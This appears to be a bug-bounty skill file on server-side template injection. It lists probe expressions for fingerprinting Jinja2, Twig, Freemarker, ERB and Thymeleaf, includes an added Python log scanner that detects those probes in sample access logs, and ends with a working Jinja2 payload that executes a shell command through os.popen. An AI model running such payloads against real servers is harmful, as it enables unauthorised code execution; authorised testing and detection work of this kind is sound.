hunt-ssti
SKILL.md
14. SSTI — SERVER-SIDE TEMPLATE INJECTION
Easy to detect, high payout ($2K–$8K). Direct path to RCE.
Detection Payloads (try all)
{{7*7}} → 49 = Jinja2 / Twig
${7*7} → 49 = Freemarker / Velocity / Mako (all use ${...})
<%= 7*7 %> → 49 = ERB (Ruby)
*{7*7} → 49 = Spring Thymeleaf
{{7*'7'}} → 7777777 = Jinja2 (Python string repetition); 49 = Twig (numeric coercion of '7'). Differentiates Jinja2 from Twig.
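On the detection side, here is an added example (not part of this skill file) that scans access-log lines for the probe strings in the table above, URL-decoding each request path first because that is how the probes usually arrive in logs. The log format, IPs and requests are constructed samples.

```python
import re
from urllib.parse import unquote_plus

# Probe expressions from the detection table, keyed by the engine family each
# one fingerprints. Matching runs on the URL-decoded path and tolerates
# whitespace inside the delimiters.
PROBES = [
    (r"\{\{\s*7\s*\*\s*'7'\s*\}\}", "Jinja2 vs Twig differentiator (7*'7')"),
    (r"\{\{\s*7\s*\*\s*7\s*\}\}",   "Jinja2 / Twig ({{7*7}})"),
    (r"\$\{\s*7\s*\*\s*7\s*\}",     "Freemarker / Velocity / Mako (${7*7})"),
    (r"<%=\s*7\s*\*\s*7\s*%>",      "ERB (<%= 7*7 %>)"),
    (r"\*\{\s*7\s*\*\s*7\s*\}",     "Thymeleaf (*{7*7})"),
]
COMPILED = [(re.compile(p), label) for p, label in PROBES]

# Minimal Common Log Format parser; only the request path is inspected here.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def classify_probe(text):
    """Return the label of the first SSTI probe found in text, or None."""
    decoded = unquote_plus(unquote_plus(text))  # also catches double-encoded probes
    for pattern, label in COMPILED:
        if pattern.search(decoded):
            return label
    return None

def scan_log(lines):
    """Return (ip, path, label) for every request whose path carries an SSTI probe."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        label = classify_probe(m.group("path"))
        if label:
            findings.append((m.group("ip"), m.group("path"), label))
    return findings

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2024:13:55:36 +0000] "GET /search?q=%7B%7B7*7%7D%7D HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Oct/2024:13:55:37 +0000] "GET /search?q=%24%7B7*7%7D HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Oct/2024:13:55:38 +0000] "GET /search?q=%7B%7B7*%277%27%7D%7D HTTP/1.1" 200 520',
    '198.51.100.7 - - [10/Oct/2024:13:56:01 +0000] "GET /search?q=hello+world HTTP/1.1" 200 498',
    '198.51.100.7 - - [10/Oct/2024:13:56:02 +0000] "GET /page?name=%3C%25%3D+7*7+%25%3E HTTP/1.1" 200 498',
]

if __name__ == "__main__":
    for ip, path, label in scan_log(SAMPLE_LOG):
        print(f"{ip} {label}: {path}")
```

A run of three different probes from one IP within seconds, as in the sample, is the pattern worth alerting on; a single `{{7*7}}` on its own is common scanner noise.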
RCE Payloads
Jinja2 (Python/Flask):
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}